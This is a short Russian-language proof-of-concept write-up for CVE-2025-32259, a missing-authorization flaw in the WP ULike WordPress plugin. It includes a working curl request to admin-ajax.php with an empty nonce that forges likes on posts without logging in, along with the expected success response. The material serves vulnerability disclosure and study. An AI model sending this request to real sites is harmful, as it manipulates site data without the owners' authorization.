
В затронутых версиях плагина WP ULike отсутствует надлежащая проверка авторизации перед разрешением определенных AJAX-действий или манипуляций с голосованием. Это позволяет неаутентифицированным пользователям взаимодействовать с плагином так, как должны только вошедшие в систему пользователи — потенциально искажая голоса или внедряя вводящие в заблуждение данные.
🔬 Простой PoC, демонстрирующий CVE-2025-32259 в плагине WP ULike для WordPress.
🚨 Только для образовательных целей – не тестируйте на системах без явного разрешения.
WP ULike — популярный плагин для WordPress, который позволяет пользователям ставить лайки контенту на сайте. Версии до 4.7.9.1 страдают от уязвимости отсутствия авторизации, позволяющей неаутентифицированным пользователям подделывать действия «лайк» через AJAX-запросы.
Уязвимость позволяет неаутентифицированным пользователям взаимодействовать с AJAX-эндпоинтом и ставить лайки любому контенту (запись, комментарий и т.д.) без разрешения.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Замените id=1 на действительный ID записи.
Успешный ответ может выглядеть так:
{"status":"success","msg":"You liked this."}